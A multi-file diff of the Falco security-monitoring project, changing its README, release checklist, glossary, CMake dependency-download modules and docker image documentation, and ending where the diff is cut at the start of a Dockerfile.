 [![Build Status](https://img.shields.io/circleci/build/github/falcosecurity/falco/master?style=for-the-badge)](https://circleci.com/gh/falcosecurity/falco) [![CII Best Practices Summary](https://img.shields.io/cii/summary/2317?label=CCI%20Best%20Practices&style=for-the-badge)](https://bestpractices.coreinfrastructure.org/projects/2317) [![GitHub](https://img.shields.io/github/license/falcosecurity/falco?style=for-the-badge)](COPYING)
 
-#### Latest releases
-
-Read the [change log](CHANGELOG.md).
-
-|        | development                                                                                                                 | stable                                                                                                              |
-|--------|-----------------------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------|
-| rpm    | [![rpm-dev](https://img.shields.io/bintray/v/falcosecurity/rpm-dev/falco?label=Falco&color=%2300aec7&style=flat-square)][1] | [![rpm](https://img.shields.io/bintray/v/falcosecurity/rpm/falco?label=Falco&color=%23005763&style=flat-square)][2] |
-| deb    | [![deb-dev](https://img.shields.io/bintray/v/falcosecurity/deb-dev/falco?label=Falco&color=%2300aec7&style=flat-square)][3] | [![deb](https://img.shields.io/bintray/v/falcosecurity/deb/falco?label=Falco&color=%23005763&style=flat-square)][4] |
-| binary | [![bin-dev](https://img.shields.io/bintray/v/falcosecurity/bin-dev/falco?label=Falco&color=%2300aec7&style=flat-square)][5] | [![bin](https://img.shields.io/bintray/v/falcosecurity/bin/falco?label=Falco&color=%23005763&style=flat-square)][6] |
-
 ---
 
 Falco is a behavioral activity monitor designed to detect anomalous activity in your applications. Falco audits a system at the most fundamental level, the kernel. Falco then enriches this data with other input streams such as container runtime metrics, and Kubernetes metrics. Falco lets you continuously monitor and detect container, application, host, and network activity—all in one place—from one source of data, with one set of rules.
@@ -37,9 +32,7 @@ Falco can detect and alert on any behavior that involves making Linux system cal
 
 ### Installing Falco
 
-You can find the latest release downloads on the official [release archive](https://bintray.com/falcosecurity)
-
-Furthermore the comprehensive [installation guide](https://falco.org/docs/installation/) for Falco is available in the documentation website.
+A comprehensive [installation guide](https://falco.org/docs/installation/) for Falco is available in the documentation website.
 
 #### How do you compare Falco with other security tools?
 
@@ -75,10 +68,3 @@ A third party security audit was performed by Cure53, you can see the full repor
 
 ### Reporting security vulnerabilities
 Please report security vulnerabilities following the community process documented [here](https://github.com/falcosecurity/.github/blob/master/SECURITY.md).
-
-[1]: https://dl.bintray.com/falcosecurity/rpm-dev
-[2]: https://dl.bintray.com/falcosecurity/rpm
-[3]: https://dl.bintray.com/falcosecurity/deb-dev/stable
-[4]: https://dl.bintray.com/falcosecurity/deb/stable
-[5]: https://dl.bintray.com/falcosecurity/bin-dev/x86_64
-[6]: https://dl.bintray.com/falcosecurity/bin/x86_64

RELEASE.md

@@ -1,79 +0,0 @@
-# Falco Release Process
-
-Our release process is mostly automated, but we still need some manual steps to initiate and complete it.
-
-Changes and new features are grouped in [milestones](https://github.com/falcosecurity/falco/milestones), the milestone with the next version represents what is going to be released. 
-
-Releases happen on a monthly cadence, towards the 16th of the on-going month, and we need to assign owners for each (usually we pair a new person with an experienced one). Assignees and the due date are proposed during the [weekly community call](https://github.com/falcosecurity/community). Note that hotfix releases can happen as soon as it is needed.
-
-Finally, on the proposed due date the assignees for the upcoming release proceed with the processes described below.
-
-## Pre-Release Checklist
-
-### 1. Release notes
-- Let `YYYY-MM-DD` the day before of the [latest release](https://github.com/falcosecurity/falco/releases)
-- Check the release note block of every PR matching the `is:pr is:merged closed:>YYY-MM-DD` [filter](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+closed%3A%3EYYYY-MM-DD)
-    - Ensure the release note block follows the [commit convention](https://github.com/falcosecurity/falco/blob/master/CONTRIBUTING.md#commit-convention), otherwise fix its content
-    - If the PR has no milestone, assign it to the milestone currently undergoing release
-- Check issues without a milestone (using [is:pr is:merged no:milestone closed:>YYYT-MM-DD](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+no%3Amilestone+closed%3A%3EYYYT-MM-DD) filter) and add them to the milestone currently undergoing release
-- Double-check that there are no more merged PRs without the target milestone assigned with the `is:pr is:merged no:milestone closed:>YYYT-MM-DD` [filters](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+no%3Amilestone+closed%3A%3EYYYT-MM-DD), if any, fix them
-
-### 2. Milestones
-- Move the [tasks not completed](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Aopen) to a new minor milestone
-- Close the completed milestone
-    
-### 3. Release PR
-
-- Double-check if any hard-coded version number is present in the code, it should be not present anywhere:
-    - If any, manually correct it then open an issue to automate version number bumping later
-    - Versions table in the `README.md` update itself automatically
-- Generate the change log https://github.com/leodido/rn2md, or https://fs.fntlnz.wtf/falco/milestones-changelog.txt for the lazy people (it updates every 5 minutes) 
-- Add the lastest changes on top the previous `CHANGELOG.md`
-- Submit a PR with the above modifications
-- Await PR approval
-
-## Release
-
-Let `x.y.z` the new version.
-
-### 1. Create a tag
-
-- Once the release PR has got merged, and the CI has done its job on the master, git tag the new release
-
-    ```
-    git pull
-    git checkout master
-    git tag x.y.z
-    git push origin x.y.z
-    ```
-
-> **N.B.**: do NOT use an annotated tag
-
-- Wait for the CI to complete
-
-### 2. Update the GitHub release
-- [Draft a new release](https://github.com/falcosecurity/falco/releases/new)
-- Use `x.y.z` both as tag version and release title
-- Use the following template to fill the release description:
-    ```
-    <!-- Copy the relevant part of the changelog here -->
-
-    ### Statistics
-
-    | Merged PRs        | Number  |
-    |-------------------|---------|
-    | Not user-facing   | x       |
-    | Release note      | x       |
-    | Total             | x       |
-
-    <!-- Calculate stats and fill the above table -->
-    ```
-
-- Finally, publish the release!
-
-## Post-Release tasks
-
-Announce the new release to the world!
-
-- Send an announcement to cncf-falco-dev@lists.cncf.io (plain text, please)
-- Let folks in the slack #falco channel know about a new release came out

brand/README.md

@@ -28,7 +28,7 @@ The CNCF now owns The Falco Project.
 ### What is Runtime Security?
 
 Runtime security refers to an approach to preventing unwanted activity on a computer system. 
-With runtime security, an operator deploys **both** prevention tooling (access control, policy enforcement, etc) along side detection tooling (systems observability, anomaly detection, etc).
+With runtime security an operator deploys **both** prevention tooling (access control, policy enforcement, etc) along side detection tooling (systems observability, anomaly detection, etc).
 Runtime security is the practice of using detection tooling to detect unwanted behavior, such that it can then be prevented using prevention techniques.
 Runtime security is a holistic approach to defense, and useful in scenarios where prevention tooling either was unaware of an exploit or attack vector, or when defective applications are ran in even the most secure environment.
 
@@ -124,9 +124,9 @@ Used to describe the `.ko` object that would be loaded into the kernel as a pote
 This is one option used to pass kernel events up to userspace for Falco to consume.
 Sometimes this word is incorrectly used to refer to a `probe`.
 
-#### Driver 
+#### Driver (deprecated)
 
-The global term for the software that sends events from the kernel. Such as the eBPF `probe` or the `kernel module`.
+An older, more generalized term for a `module` or `probe`. We discourage the use of this word as a project.
 
 #### Falco
 

cmake/modules/CPackConfig.cmake

@@ -1,12 +1,9 @@
 set(CPACK_PACKAGE_NAME "${PACKAGE_NAME}")
 set(CPACK_PACKAGE_VENDOR "Cloud Native Computing Foundation (CNCF) cncf.io.")
-set(CPACK_PACKAGE_CONTACT "cncf-falco-dev@lists.cncf.io") # todo: change this once we've got @falco.org addresses
+set(CPACK_PACKAGE_CONTACT "opensource@sysdig.com") # todo: change this once we've got @falco.org addresses
 set(CPACK_PACKAGE_DESCRIPTION_SUMMARY "Falco - Container Native Runtime Security")
 set(CPACK_PACKAGE_DESCRIPTION_FILE "${PROJECT_SOURCE_DIR}/scripts/description.txt")
 set(CPACK_PACKAGE_VERSION "${FALCO_VERSION}")
-set(CPACK_PACKAGE_VERSION_MAJOR "${FALCO_VERSION_MAJOR}")
-set(CPACK_PACKAGE_VERSION_MINOR "${FALCO_VERSION_MINOR}")
-set(CPACK_PACKAGE_VERSION_PATCH "${FALCO_VERSION_PATCH}")
 set(CPACK_PACKAGE_FILE_NAME "${CPACK_PACKAGE_NAME}-${CPACK_PACKAGE_VERSION}-${CMAKE_SYSTEM_PROCESSOR}")
 set(CPACK_PROJECT_CONFIG_FILE "${PROJECT_SOURCE_DIR}/cmake/cpack/CMakeCPackOptions.cmake")
 set(CPACK_STRIP_FILES "ON")
@@ -19,15 +16,15 @@ set(CPACK_DEBIAN_PACKAGE_ARCHITECTURE "amd64")
 set(CPACK_DEBIAN_PACKAGE_HOMEPAGE "https://www.falco.org")
 set(CPACK_DEBIAN_PACKAGE_DEPENDS "dkms (>= 2.1.0.0), libyaml-0-2")
 set(CPACK_DEBIAN_PACKAGE_CONTROL_EXTRA
-    "${CMAKE_BINARY_DIR}/scripts/debian/postinst;${CMAKE_BINARY_DIR}/scripts/debian/prerm;${CMAKE_BINARY_DIR}/scripts/debian/postrm;${PROJECT_SOURCE_DIR}/cmake/cpack/debian/conffiles"
+    "${CMAKE_BINARY_DIR}/scripts/debian/postinst;${CMAKE_BINARY_DIR}/scripts/debian/prerm;${PROJECT_SOURCE_DIR}/scripts/debian/postrm;${PROJECT_SOURCE_DIR}/cmake/cpack/debian/conffiles"
 )
 
 set(CPACK_RPM_PACKAGE_LICENSE "Apache v2.0")
 set(CPACK_RPM_PACKAGE_URL "https://www.falco.org")
 set(CPACK_RPM_PACKAGE_REQUIRES "dkms, kernel-devel, libyaml, ncurses")
-set(CPACK_RPM_POST_INSTALL_SCRIPT_FILE "${CMAKE_BINARY_DIR}/scripts/rpm/postinstall")
-set(CPACK_RPM_PRE_UNINSTALL_SCRIPT_FILE "${CMAKE_BINARY_DIR}/scripts/rpm/preuninstall")
-set(CPACK_RPM_POST_UNINSTALL_SCRIPT_FILE "${CMAKE_BINARY_DIR}/scripts/rpm/postuninstall")
+set(CPACK_RPM_POST_INSTALL_SCRIPT_FILE "${PROJECT_SOURCE_DIR}/scripts/rpm/postinstall")
+set(CPACK_RPM_PRE_UNINSTALL_SCRIPT_FILE "${PROJECT_SOURCE_DIR}/scripts/rpm/preuninstall")
+set(CPACK_RPM_POST_UNINSTALL_SCRIPT_FILE "${PROJECT_SOURCE_DIR}/scripts/rpm/postuninstall")
 set(CPACK_RPM_PACKAGE_VERSION "${FALCO_VERSION}")
 set(CPACK_RPM_EXCLUDE_FROM_AUTO_FILELIST_ADDITION
     /usr/src

cmake/modules/DownloadCatch.cmake

@@ -12,17 +12,16 @@
 #
 include(ExternalProject)
 
-set(CATCH2_PREFIX ${CMAKE_BINARY_DIR}/catch2-prefix)
-set(CATCH2_INCLUDE ${CATCH2_PREFIX}/include)
+set(CATCH2_INCLUDE ${CMAKE_BINARY_DIR}/catch2-prefix/include)
 
-set(CATCH_EXTERNAL_URL URL https://github.com/catchorg/catch2/archive/v2.12.1.tar.gz URL_HASH
-                       SHA256=e5635c082282ea518a8dd7ee89796c8026af8ea9068cd7402fb1615deacd91c3)
+set(CATCH_EXTERNAL_URL URL https://github.com/catchorg/catch2/archive/v2.9.1.tar.gz URL_HASH
+                       MD5=4980778888fed635bf191d8a86f9f89c)
 
 ExternalProject_Add(
   catch2
-  PREFIX ${CATCH2_PREFIX}
+  PREFIX ${CMAKE_BINARY_DIR}/catch2-prefix
   ${CATCH_EXTERNAL_URL}
   CONFIGURE_COMMAND ""
   BUILD_COMMAND ""
-  INSTALL_COMMAND ${CMAKE_COMMAND} -E copy ${CATCH2_PREFIX}/src/catch2/single_include/catch2/catch.hpp
+  INSTALL_COMMAND ${CMAKE_COMMAND} -E copy ${CMAKE_BINARY_DIR}/catch2-prefix/src/catch2/single_include/catch2/catch.hpp
                   ${CATCH2_INCLUDE}/catch.hpp)

cmake/modules/DownloadFakeIt.cmake

@@ -15,7 +15,7 @@ include(ExternalProject)
 set(FAKEIT_INCLUDE ${CMAKE_BINARY_DIR}/fakeit-prefix/include)
 
 set(FAKEIT_EXTERNAL_URL URL https://github.com/eranpeer/fakeit/archive/2.0.5.tar.gz URL_HASH
-                        SHA256=298539c773baca6ecbc28914306bba19d1008e098f8adc3ad3bb00e993ecdf15)
+                        MD5=d3d21b909cebaea5b780af5500bf384e)
 
 ExternalProject_Add(
   fakeit-external

cmake/modules/DownloadHedley.cmake

@@ -1,26 +0,0 @@
-#
-# Copyright (C) 2019 The Falco Authors.
-#
-# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
-# the License. You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
-# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
-# specific language governing permissions and limitations under the License.
-#
-include(ExternalProject)
-
-set(HEDLEY_PREFIX ${CMAKE_BINARY_DIR}/hedley-prefix)
-set(HEDLEY_INCLUDE ${HEDLEY_PREFIX}/include)
-message(STATUS "Found hedley: include: ${HEDLEY_INCLUDE}")
-
-ExternalProject_Add(
-  hedley
-  PREFIX ${HEDLEY_PREFIX}
-  GIT_REPOSITORY "https://github.com/nemequ/hedley.git"
-  GIT_TAG "v13"
-  CONFIGURE_COMMAND ""
-  BUILD_COMMAND ""
-  INSTALL_COMMAND ${CMAKE_COMMAND} -E copy ${HEDLEY_PREFIX}/src/hedley/hedley.h ${HEDLEY_INCLUDE}/hedley.h)

cmake/modules/FlatBuffers.cmake

@@ -1,82 +0,0 @@
-#
-# Copyright (C) 2020 The Falco Authors.
-#
-# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
-# the License. You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
-# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
-# specific language governing permissions and limitations under the License.
-#
-
-if(NOT USE_BUNDLED_DEPS)
-  find_program(FLATBUFFERS_FLATC_EXECUTABLE NAMES flatc)
-  find_path(FLATBUFFERS_INCLUDE_DIR NAMES flatbuffers/flatbuffers.h)
-
-  if(FLATBUFFERS_FLATC_EXECUTABLE AND FLATBUFFERS_INCLUDE_DIR)
-    message(STATUS "Found flatbuffers: include: ${FLATBUFFERS_INCLUDE_DIR}, flatc: ${FLATBUFFERS_FLATC_EXECUTABLE}")
-  else()
-    message(FATAL_ERROR "Couldn't find system flatbuffers")
-  endif()
-else()
-  include(ExternalProject)
-
-  set(FLATBUFFERS_PREFIX ${CMAKE_BINARY_DIR}/flatbuffers-prefix)
-  set(FLATBUFFERS_FLATC_EXECUTABLE
-      ${FLATBUFFERS_PREFIX}/bin/flatc
-      CACHE INTERNAL "FlatBuffer compiler")
-  set(FLATBUFFERS_INCLUDE_DIR
-      ${FLATBUFFERS_PREFIX}/include
-      CACHE INTERNAL "FlatBuffer include directory")
-
-  ExternalProject_Add(
-    flatbuffers
-    PREFIX ${FLATBUFFERS_PREFIX}
-    GIT_REPOSITORY "https://github.com/google/flatbuffers.git"
-    GIT_TAG "v1.12.0"
-    CMAKE_ARGS
-      -DCMAKE_INSTALL_PREFIX=${FLATBUFFERS_PREFIX}
-      -DCMAKE_BUILD_TYPE=Release
-      -DFLATBUFFERS_CODE_COVERAGE=OFF
-      -DFLATBUFFERS_BUILD_TESTS=OFF
-      -DFLATBUFFERS_INSTALL=ON
-      -DFLATBUFFERS_BUILD_FLATLIB=OFF
-      -DFLATBUFFERS_BUILD_FLATC=ON
-      -DFLATBUFFERS_BUILD_FLATHASH=OFF
-      -DFLATBUFFERS_BUILD_GRPCTEST=OFF
-      -DFLATBUFFERS_BUILD_SHAREDLIB=OFF
-    BUILD_BYPRODUCTS ${FLATBUFFERS_FLATC_EXECUTABLE})
-endif()
-
-# From FindFlatBuffer.cmake
-include(FindPackageHandleStandardArgs)
-find_package_handle_standard_args(FlatBuffers DEFAULT_MSG FLATBUFFERS_FLATC_EXECUTABLE FLATBUFFERS_INCLUDE_DIR)
-
-if(FLATBUFFERS_FOUND)
-  function(FLATBUFFERS_GENERATE_C_HEADERS Name)
-    set(FLATC_OUTPUTS)
-    foreach(FILE ${ARGN})
-      get_filename_component(FLATC_OUTPUT ${FILE} NAME_WE)
-      set(FLATC_OUTPUT "${CMAKE_CURRENT_BINARY_DIR}/${FLATC_OUTPUT}_generated.h")
-
-      list(APPEND FLATC_OUTPUTS ${FLATC_OUTPUT})
-
-      add_custom_command(
-        OUTPUT ${FLATC_OUTPUT}
-        COMMAND ${FLATBUFFERS_FLATC_EXECUTABLE} ARGS -c -o "${CMAKE_CURRENT_BINARY_DIR}/" ${FILE}
-        DEPENDS ${FILE}
-        COMMENT "Building C++ header for ${FILE}"
-        WORKING_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR})
-    endforeach()
-    set(${Name}_OUTPUTS
-        ${FLATC_OUTPUTS}
-        PARENT_SCOPE)
-  endfunction()
-
-  set(FLATBUFFERS_INCLUDE_DIRS ${FLATBUFFERS_INCLUDE_DIR})
-  include_directories(${CMAKE_BINARY_DIR})
-else()
-  set(FLATBUFFERS_INCLUDE_DIR)
-endif()

cmake/modules/GetFalcoVersion.cmake

@@ -1,5 +1,6 @@
 # Retrieve git ref and commit hash
 include(GetGitRevisionDescription)
+get_git_head_revision(FALCO_REF FALCO_HASH)
 
 # Create the falco version variable according to git index
 if(NOT FALCO_VERSION)
@@ -8,13 +9,25 @@ if(NOT FALCO_VERSION)
   git_get_exact_tag(FALCO_TAG)
   if(NOT FALCO_TAG)
     # Obtain the closest tag
-    git_describe(FALCO_VERSION "--always" "--tags")
+    git_describe(FALCO_VERSION "--abbrev=0" "--tags") # suppress the long format
     # Fallback version
     if(FALCO_VERSION MATCHES "NOTFOUND$")
       set(FALCO_VERSION "0.0.0")
     endif()
-    # Format FALCO_VERSION to be semver with prerelease and build part
-    string(REPLACE "-g" "+" FALCO_VERSION "${FALCO_VERSION}")
+    # TODO(leodido) > Construct the prerelease part (semver 2) Construct the Build metadata part (semver 2)
+    if(NOT FALCO_HASH MATCHES "NOTFOUND$")
+      string(SUBSTRING "${FALCO_HASH}" 0 7 FALCO_VERSION_BUILD)
+      # Check whether there are uncommitted changes or not
+      git_local_changes(FALCO_CHANGES)
+      if(FALCO_CHANGES STREQUAL "DIRTY")
+        string(TOLOWER "${FALCO_CHANGES}" FALCO_CHANGES)
+        set(FALCO_VERSION_BUILD "${FALCO_VERSION_BUILD}.${FALCO_CHANGES}")
+      endif()
+    endif()
+    # Append the build metadata part (semver 2)
+    if(FALCO_VERSION_BUILD)
+      set(FALCO_VERSION "${FALCO_VERSION}+${FALCO_VERSION_BUILD}")
+    endif()
   else()
     # A tag has been found: use it as the Falco version
     set(FALCO_VERSION "${FALCO_TAG}")
@@ -29,8 +42,8 @@ if(NOT FALCO_VERSION)
   string(
     REGEX
     REPLACE
-      "^(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)-((0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*)(\\.(0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*))*).*"
-      "\\5"
+      "^(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)-((0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*)\\.(0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*)*).*"
+      "\\4"
       FALCO_VERSION_PRERELEASE
       "${FALCO_VERSION}")
   if(FALCO_VERSION_PRERELEASE STREQUAL "${FALCO_VERSION}")

cmake/modules/OpenSSL.cmake

@@ -21,7 +21,7 @@ else()
     openssl
     # START CHANGE for CVE-2017-3735, CVE-2017-3731, CVE-2017-3737, CVE-2017-3738, CVE-2017-3736
     URL "https://s3.amazonaws.com/download.draios.com/dependencies/openssl-1.0.2n.tar.gz"
-    URL_HASH "SHA256=370babb75f278c39e0c50e8c4e7493bc0f18db6867478341a832a982fd15a8fe"
+    URL_MD5 "13bdc1b1d1ff39b6fd42a255e74676a4"
     # END CHANGE for CVE-2017-3735, CVE-2017-3731, CVE-2017-3737, CVE-2017-3738, CVE-2017-3736
     CONFIGURE_COMMAND ./config shared --prefix=${OPENSSL_INSTALL_DIR}
     BUILD_COMMAND ${CMD_MAKE}

cmake/modules/cURL.cmake

@@ -32,7 +32,7 @@ else()
     DEPENDS openssl
     # START CHANGE for CVE-2017-8816, CVE-2017-8817, CVE-2017-8818, CVE-2018-1000007
     URL "https://s3.amazonaws.com/download.draios.com/dependencies/curl-7.61.0.tar.bz2"
-    URL_HASH "SHA256=5f6f336921cf5b84de56afbd08dfb70adeef2303751ffb3e570c936c6d656c9c"
+    URL_MD5 "31d0a9f48dc796a7db351898a1e5058a"
     # END CHANGE for CVE-2017-8816, CVE-2017-8817, CVE-2017-8818, CVE-2018-1000007
     CONFIGURE_COMMAND
       ./configure

cmake/modules/gRPC.cmake

@@ -1,5 +1,5 @@
 #
-# Copyright (C) 2020 The Falco Authors.
+# Copyright (C) 2019 The Falco Authors.
 #
 # Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
 # the License. You may obtain a copy of the License at
@@ -42,15 +42,6 @@ if(NOT USE_BUNDLED_DEPS)
     message(FATAL_ERROR "Couldn't find system protobuf")
   endif()
 
-  # gpr
-  find_library(GPR_LIB NAMES gpr)
-
-  if(GPR_LIB)
-    message(STATUS "Found gpr lib: ${GPR_LIB}")
-  else()
-    message(FATAL_ERROR "Couldn't find system gpr")
-  endif()
-
   # gRPC todo(fntlnz, leodido): check that gRPC version is greater or equal than 1.8.0
   find_path(GRPCXX_INCLUDE NAMES grpc++/grpc++.h)
   if(GRPCXX_INCLUDE)

cmake/modules/jq.cmake

@@ -26,7 +26,7 @@ else()
   ExternalProject_Add(
     jq
     URL "https://github.com/stedolan/jq/releases/download/jq-1.5/jq-1.5.tar.gz"
-    URL_HASH "SHA256=c4d2bfec6436341113419debf479d833692cc5cdab7eb0326b5a4d4fbe9f493c"
+    URL_MD5 "0933532b086bd8b6a41c1b162b1731f9"
     CONFIGURE_COMMAND ./configure --disable-maintainer-mode --enable-all-static --disable-dependency-tracking
     BUILD_COMMAND ${CMD_MAKE} LDFLAGS=-all-static
     BUILD_IN_SOURCE 1

cmake/modules/sysdig-repo/CMakeLists.txt

@@ -15,14 +15,20 @@ cmake_minimum_required(VERSION 3.5.1)
 project(sysdig-repo NONE)
 
 include(ExternalProject)
-message(STATUS "Driver version: ${SYSDIG_VERSION}")
+
+# The sysdig git reference (branch name, commit hash, or tag)
+
+# To update sysdig version for the next release, change the default below
+# In case you want to test against another sysdig version just pass the variable - ie., `cmake -DSYSDIG_VERSION=dev ..`
+if(NOT SYSDIG_VERSION)
+  set(SYSDIG_VERSION "146a431edf95829ac11bfd9c85ba3ef08789bffe")
+endif()
 
 ExternalProject_Add(
   sysdig
   URL "https://github.com/draios/sysdig/archive/${SYSDIG_VERSION}.tar.gz"
-  URL_HASH "${SYSDIG_CHECKSUM}"
+  # URL_HASH SHA256=bd09607aa8beb863db07e695863f7dc543e2d39e7153005759d26a340ff66fa5
   CONFIGURE_COMMAND ""
   BUILD_COMMAND ""
   INSTALL_COMMAND ""
-  TEST_COMMAND ""
-  PATCH_COMMAND patch -p1 -i ${CMAKE_CURRENT_SOURCE_DIR}/patch/libscap.patch)
+  TEST_COMMAND "")

cmake/modules/sysdig-repo/patch/libscap.patch

@@ -1,31 +0,0 @@
-diff --git a/userspace/libscap/scap.c b/userspace/libscap/scap.c
-index e9faea51..a1b3b501 100644
---- a/userspace/libscap/scap.c
-+++ b/userspace/libscap/scap.c
-@@ -52,7 +52,7 @@ limitations under the License.
- //#define NDEBUG
- #include <assert.h>
- 
--static const char *SYSDIG_BPF_PROBE_ENV = "SYSDIG_BPF_PROBE";
-+static const char *SYSDIG_BPF_PROBE_ENV = "FALCO_BPF_PROBE";
- 
- //
- // Probe version string size
-@@ -171,7 +171,7 @@ scap_t* scap_open_live_int(char *error, int32_t *rc,
- 				return NULL;
- 			}
- 
--			snprintf(buf, sizeof(buf), "%s/.sysdig/%s-bpf.o", home, PROBE_NAME);
-+			snprintf(buf, sizeof(buf), "%s/.falco/%s-bpf.o", home, PROBE_NAME);
- 			bpf_probe = buf;
- 		}
- 	}
-@@ -1808,7 +1808,7 @@ int32_t scap_disable_dynamic_snaplen(scap_t* handle)
- 
- const char* scap_get_host_root()
- {
--	char* p = getenv("SYSDIG_HOST_ROOT");
-+	char* p = getenv("HOST_ROOT");
- 	static char env_str[SCAP_MAX_PATH_SIZE + 1];
- 	static bool inited = false;
- 	if (! inited) {

cmake/modules/sysdig.cmake

@@ -21,19 +21,8 @@ if(USE_BUNDLED_DEPS)
 endif()
 
 file(MAKE_DIRECTORY ${SYSDIG_CMAKE_WORKING_DIR})
-
-# The sysdig git reference (branch name, commit hash, or tag)
-# To update sysdig version for the next release, change the default below
-# In case you want to test against another sysdig version just pass the variable - ie., `cmake -DSYSDIG_VERSION=dev ..`
-if(NOT SYSDIG_VERSION)
-  set(SYSDIG_VERSION "96bd9bc560f67742738eb7255aeb4d03046b8045")
-  set(SYSDIG_CHECKSUM "SHA256=766e8952a36a4198fd976b9d848523e6abe4336612188e4fc911e217d8e8a00d")
-endif()
-set(PROBE_VERSION "${SYSDIG_VERSION}")
-
 # cd /path/to/build && cmake /path/to/source
-execute_process(COMMAND "${CMAKE_COMMAND}" -DSYSDIG_VERSION=${SYSDIG_VERSION} -DSYSDIG_CHECKSUM=${SYSDIG_CHECKSUM} ${SYSDIG_CMAKE_SOURCE_DIR} WORKING_DIRECTORY ${SYSDIG_CMAKE_WORKING_DIR})
-
+execute_process(COMMAND "${CMAKE_COMMAND}" ${SYSDIG_CMAKE_SOURCE_DIR} WORKING_DIRECTORY ${SYSDIG_CMAKE_WORKING_DIR})
 
 # todo(leodido, fntlnz) > use the following one when CMake version will be >= 3.13
 

cmake/modules/yaml-cpp.cmake

@@ -26,7 +26,7 @@ else()
   ExternalProject_Add(
     yamlcpp
     URL "https://github.com/jbeder/yaml-cpp/archive/yaml-cpp-0.6.2.tar.gz"
-    URL_HASH "SHA256=e4d8560e163c3d875fd5d9e5542b5fd5bec810febdcba61481fe5fc4e6b1fd05"
+    URL_MD5 "5b943e9af0060d0811148b037449ef82"
     BUILD_IN_SOURCE 1
     INSTALL_COMMAND "")
 endif()

docker/OWNERS

@@ -1,6 +1,2 @@
 labels:
-  - area/integration
-approvers:
-  - leogr
-reviewers:
-  - leogr
+  - area/integration

docker/README.md

@@ -1,17 +1,30 @@
 # Falco Dockerfiles
 
-This directory contains various ways to package Falco as a container and related tools. 
+This directory contains the various ways to package Falco as a container. 
 
-## Currently Supported Images
+## Currently Supported Containers
 
-| Name | Directory | Description |
-|---|---|---|
-| [falcosecurity/falco:latest](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:_tag_](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:master](https://hub.docker.com/repository/docker/falcosecurity/falco) | docker/stable | Falco (DEB built from git tag or from the master) with all the building toolchain. | 
-| [falcosecurity/falco:latest-slim](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:_tag_-slim](https://hub.docker.com/repository/docker/falcosecurity/falco),[falcosecurity/falco:master-slim](https://hub.docker.com/repository/docker/falcosecurity/falco) | docker/slim | Falco (DEB build from git tag or from the master) without the building toolchain. |
-| [falcosecurity/falco-driver-loader:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-driver-loader), [falcosecurity/falco-driver-loader:_tag_](https://hub.docker.com/repository/docker/falcosecurity/falco-driver-loader), [falcosecurity/falco-driver-loader:master](https://hub.docker.com/repository/docker/falcosecurity/falco-driver-loader) | docker/driver-loader | `falco-driver-loader` as entrypoint with the building toolchain. | 
-| [falcosecurity/falco-builder:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-builder) | docker/builder | The complete build tool chain for compiling Falco from source. See [the documentation](https://falco.org/docs/source/) for more details on building from source. Used to build Falco (CI). | 
-| [falcosecurity/falco-tester:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-tester) | docker/tester | Container image for running the Falco test suite. Used to run Falco integration tests (CI). | 
-| _to not be published_ | docker/local | Built on-the-fly and used by falco-tester. |
+### `falcosecurity/falco` Dockerfiles
+ - `./dev`: Builds a container image from the `dev` apt repo.
+ - `./stable`: Builds a container image from the `stable` apt repo.
+ - `./local`: Builds a container image from a locally provided Falco `dpkg` package.
 
-> Note: `falco-builder`, `falco-tester` (and the `docker/local` image that it's built on the fly) are not integrated into the release process because they are development and CI tools that need to be manually pushed only when updated.
+### Build & Testing Dockerfiles
+ - `./builder`: `falcosecurity/falco-builder` - The complete build tool chain for compiling Falco from source. See [the documentation](https://falco.org/docs/source/) for more details on building from source.
+ - `./tester`: `falcosecurity/falco-tester` - Container image for running the Falco test suite.
+
+## Alpha Release Containers
+
+These Dockerfiles (and resulting container images) are currently in `alpha`. We'd love for you to test these images and [report any feedback](https://github.com/falcosecurity/falco/issues/new/choose).
+
+### Slim and Minimal Dockerfiles
+The goal of these container images is to reduce the size of the underlying Falco container. 
+ - `./slim-dev`: Like `./dev` above but removes build tools for older kernels.
+ - `./slim-stable`: Like `./stable` above but removes build tools for older kernels.
+ - `./minimal`: A minimal container image (~20mb), containing only the files required to run Falco.
+
+### Init Containers
+These container images allow for the delivery of the kernel module or eBPF probe either via HTTP or via a container image.
+ - `kernel/linuxkit`: Multistage Dockerfile to build a Falco kernel module for Linuxkit (Docker Desktop). Generates an alpine based container image with the kernel module, and `insmod` as the container `CMD`.  
+ - `kernel/probeloader`: Multistage Dockerfile to build a Go based application to download (via HTTPS) and load a Falco kernel module. The resulting container image can be ran as an `initContainer` to load the Falco module before Falco starts.
 

docker/builder/Dockerfile

@@ -2,7 +2,7 @@ FROM centos:7
 
